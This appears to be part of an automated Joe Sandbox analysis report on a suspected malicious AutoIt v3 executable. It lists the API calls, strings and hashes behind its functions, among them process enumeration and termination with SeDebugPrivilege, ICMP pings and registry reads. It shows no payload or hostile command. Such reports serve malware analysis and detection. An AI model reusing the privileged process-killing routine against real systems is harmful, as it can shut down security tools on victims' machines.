                                                                                                                                                                                                                                                                              • Part of subcall function 00C3071A: CreateFileW.KERNEL32(00000000,00000000,?,00C30A84,?,?,00000000,?,00C30A84,00000000,0000000C), ref: 00C30737
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30AEF
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30AF6
                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00C30B02
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30B0C
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30B15
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C30B35
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C30C7F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30CB1
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30CB8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00BF55B2
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BF525A
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF53C4
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C34BFD
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C34C3E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C34C80
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C34CE7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C34CF6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BF34DE
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00BF34ED
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00BF3503
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00BF3515
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00BF3527
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF353F
                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00BF3590
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: GetSysColorBrush.USER32(0000000F), ref: 00BF3657
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: RegisterClassExW.USER32(00000030), ref: 00BF3681
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF3692
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: InitCommonControlsEx.COMCTL32(?), ref: 00BF36AF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF36BF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: LoadIconW.USER32(000000A9), ref: 00BF36D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF36E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00C71019
                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00C71079
                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00C71085
                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00C71093
                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C71123
                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C71142
                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C71216
                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00C7121C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BF3709,?,?), ref: 00BF3777
                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00BF3709,?,?), ref: 00BF37A3
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF37C6
                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BF3709,?,?), ref: 00BF37D1
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00BF37E5
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00BF3806
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 12721e6fcc9728aad527510f19d78deab06c9e6524428431cc6f28c7b8b772d2
                                                                                                                                                                                                                                                                            • Instruction ID: b19bf86713799e4f308b24a5429c93d814d68517a161467c3cf58e90cbae7df6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12721e6fcc9728aad527510f19d78deab06c9e6524428431cc6f28c7b8b772d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7C1E570D04259AFDF11DFE9E841BADBBB0EF0A310F084059E965A77A2C7309E42DB61

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                            • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                            • Opcode ID: 5eff6b7c6fed7325d107f6426d341cdc1f43954b6766732ba9c7dd58ce8a1af2
                                                                                                                                                                                                                                                                            • Instruction ID: 7accb634d2c3fdff09dbad0719e72c4b32155f7a7fe5e0bf33825c16ca979a86
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eff6b7c6fed7325d107f6426d341cdc1f43954b6766732ba9c7dd58ce8a1af2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 066248B05083459FC728DF15C494AAEBBE1FF89308F10895EE5998B391DB71DA49CF82

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5DDAC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00C5DDBA
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DD87: CloseHandle.KERNEL32(00000000), ref: 00C5DE87
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7ABCA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7ABDD
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7AC10
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7ACC5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C7ACD0
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7AD21
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                            • Opcode ID: 84381834701242ed5a107eb2ca570fa3beedfa35e981ee9e6667c04d8d59f666
                                                                                                                                                                                                                                                                            • Instruction ID: 1c7c74e3123a20f590444f47eeab44912a32613381fc54d7b600acd7532a7b28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84381834701242ed5a107eb2ca570fa3beedfa35e981ee9e6667c04d8d59f666
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE619074204242AFD321DF15C495F29BBE1AF94318F14C49CE46A8B7A3C772ED49CB92

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1062 bf35b3-bf3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF35E1
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3602
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF3616
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF361F
                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C35287
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF6299
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF58EF
                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF5910
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF5932
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 00C448C6
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C015F2
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1056ad2d7784573e8b4328ba407bdc9887dc7769326c622c06e894eaba29f141
                                                                                                                                                                                                                                                                            • Instruction ID: d1b1f1c88ec802c184722e52eefa30d05adee930997209156f8677c09301ae57
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1056ad2d7784573e8b4328ba407bdc9887dc7769326c622c06e894eaba29f141
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93B28D74A08340CFCB24CF19C480B2AB7E1BF99700F29895DE9958B392D771EE85DB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C109D8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C13614: RaiseException.KERNEL32(?,?,?,00C109FA,?,00000000,?,?,?,?,?,?,00C109FA,00000000,00CB9758,00000000), ref: 00C13674
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C109F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                            • Opcode ID: 62ff42115d759bdb972f5ea4ecf09498bcd546a5ed0fe12c98bd49ddd5976045
                                                                                                                                                                                                                                                                            • Instruction ID: 0e4f36345357b31b6faef47d9ead1270e28ada947604efed8d18aaae292558c4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62ff42115d759bdb972f5ea4ecf09498bcd546a5ed0fe12c98bd49ddd5976045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0C23490020CB78F00BAA5EC568DE776C9E03354FB04120B924A6592FBB0EBD6F6D0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C78D52
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C78D59
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C78F3A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                            • Opcode ID: ae398e2a0e39109d7643fbba2d0940e324dc50e930de96cc336321650c75297d
                                                                                                                                                                                                                                                                            • Instruction ID: 2fb5d01f61e8bc01afd9798103d54a26d977eed96622ca2470aca35edf4b1114
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae398e2a0e39109d7643fbba2d0940e324dc50e930de96cc336321650c75297d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8127D71A083419FC714DF24C484B6ABBE5FF88324F14895DE9998B392CB31ED49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                            • Opcode ID: 801c485e0cf30e58027410b6e65f343482b5c0daf55732ff9d0580cd9032012f
                                                                                                                                                                                                                                                                            • Instruction ID: 0e746785c68f9c216a2e050f0a6bec624eb57571be94f83e717db5b0dc93d5f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 801c485e0cf30e58027410b6e65f343482b5c0daf55732ff9d0580cd9032012f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69A16B31604505EFCB28DF18D5D19A9BBE1FF56314B60C4ADE81A8F292DB31ED86DB80
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF32AF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF32B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF32C2
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF32CD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF32D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF32DD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3205: RegisterWindowMessageW.USER32(00000004,?,00BF2964), ref: 00BF325D
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BF2A0A
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00BF2A28
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00C33A0D
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                            • Opcode ID: c41dd59217b3ebbb566c20c72e761547d14f4fc2321e43cc8436e26a0543a708
                                                                                                                                                                                                                                                                            • Instruction ID: 769c1b3ad2375c9bcb25c92c459c50da821c43f0ce4dcda351275e8667dcc460
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c41dd59217b3ebbb566c20c72e761547d14f4fc2321e43cc8436e26a0543a708
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A47178B19113048F8B88EF69ED69F2E7BE1FB4830575041AEE109C73A1EBB045469F58
APIs
  • Part of subcall function 00BF61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF6299
• KillTimer.USER32(?,00000001,?,?), ref: 00C0FD36
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C0FD45
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4FE33
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 2f9197ef17771d28f1d059ab8a45dde32c853c535071459fcecc16ba6bebce54
• Instruction ID: 7fc72b26f558f58dd2f9244f6e66c0ce5ead84e025cced448336d79f1cda9b0a
• Opcode Fuzzy Hash: 2f9197ef17771d28f1d059ab8a45dde32c853c535071459fcecc16ba6bebce54
• Instruction Fuzzy Hash: ED31A971904754AFDB32CF24C855BEBBBECAF02304F04049ED5DA97142C3745A86CB51
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,?,00C2894C,?,00CB9CE8,0000000C), ref: 00C28A84
• GetLastError.KERNEL32(?,00C2894C,?,00CB9CE8,0000000C), ref: 00C28A8E
• __dosmaperr.LIBCMT ref: 00C28AB9
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
